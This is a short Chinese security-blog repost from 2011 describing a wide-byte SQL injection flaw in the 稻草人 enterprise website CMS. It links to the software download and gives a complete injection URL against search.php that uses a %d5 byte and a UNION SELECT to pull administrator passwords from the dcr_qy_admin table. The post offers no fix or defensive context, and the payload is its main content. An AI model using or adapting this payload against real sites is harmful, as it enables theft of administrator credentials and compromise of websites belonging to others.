游侠安全网--张百川(网路游侠)的博客

张百川(网路游侠,www.youxia.org)专注:网络安全、系统安全、应用安全、数据库安全、运维安全.

导航

« 风讯FoosunCMS浏览目录创建文件漏洞&xss+up上传鸡肋漏洞利用网易与奇虎360就邮箱安全深度合作 »

2011-5-16 10:26:16

稻草人企业站管理系统宽字节注入

  偶然在站长下载站下了一套企业建站程序
  发现人气还蛮高的

  下载地址
  http://down.chinaz.com/soft/26802.htm

  就去测试一下发现了一个宽字节注入漏洞
  

http://127.0.0.1/search.php?k=10%d5'%20union%20select%201,password,3%20from%20dcr_qy_admin%23

  爆密码的效果如下


  转自:t00ls
Tags: 稻草人企业站管理系统  企业网站管理系统  
发布:网路游侠 | 分类:站长学院 | 评论:0 | 引用:0 | 浏览:
  • 相关文章:

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Tags

站内搜索-Search

  • 找不到需要的?搜下试试!

日历

最近发表

产品推广

  • 广告位招租,有意者联系:
  • 张先生 电话:15339230081
  • QQ:175589438、55984512

最新评论及回复

Powered By Z-Blog 1.8 Walle Build 91204 Using ThinkTwice Theme Designed By Sino Blog

Auto Publisher Copyright 2005-2012 游侠安全网(Www.YouXia.Org)陕ICP备05000100号